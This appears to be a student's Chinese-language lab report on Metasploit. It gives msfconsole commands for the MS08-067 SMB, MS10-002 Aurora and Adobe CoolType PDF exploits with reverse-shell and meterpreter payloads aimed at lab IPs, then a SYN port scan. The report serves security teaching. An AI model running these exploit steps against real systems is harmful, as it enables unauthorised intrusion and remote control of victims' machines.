本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
search ms08_067查询针对该漏洞的攻击模块:
use exploit/windows/smb/ms08_067_netapi使用该模块show payloads会显示出有效的攻击载荷:
set payload generic/shell_reverse_tcp设置攻击有效载荷set LHOST 192.168.152.130, set RHOST 192.168.152.131show options查看payload状态:
exploit开始攻击,攻击成功(若攻击失败,则需要关闭XP的防火墙):
ipconfig/all:
ipconfig/all:
search ms10_002指令查看可以运用的攻击模块。
use windows/browser/ms10_002_aurora模块。info查看该模块的信息:
set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。show options确认需要设置的参数是否已经设置好:
exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:


sessions -i 1,成功获取靶机的shell,可以对其进行操作:
use exploit/windows/fileformat/adobe_cooltype_sing进入模块。set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,并设置相关数据:
exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里:

use exploit/multi/handler新建监听模块:
sysinfo,攻击成功:
show auxiliary查看所有辅助模块,并从中选择一个。我使用的是scanner/portscan/syn。它是通过发送TCP SYN标志的方式来探测开放的端口。show options查看配置,并进行相关配置:
run,发现扫描开放端口成功:
实战的话还需要结合靶机的环境去考虑。
这次实验再次能够看出msf是一个比较全面的工具,但渗透的局限性也比较明显。由于前几天在准备考试,这次实验完成得比较晚,但在其他同学的帮助下完成速度还是比较快的,毕竟比他们少走了很多弯路。而且这次又从其他角度成功地进行了攻击,学习到了不少新的东西,美滋滋:D。
原文:https://www.cnblogs.com/yangdi0420/p/8947413.html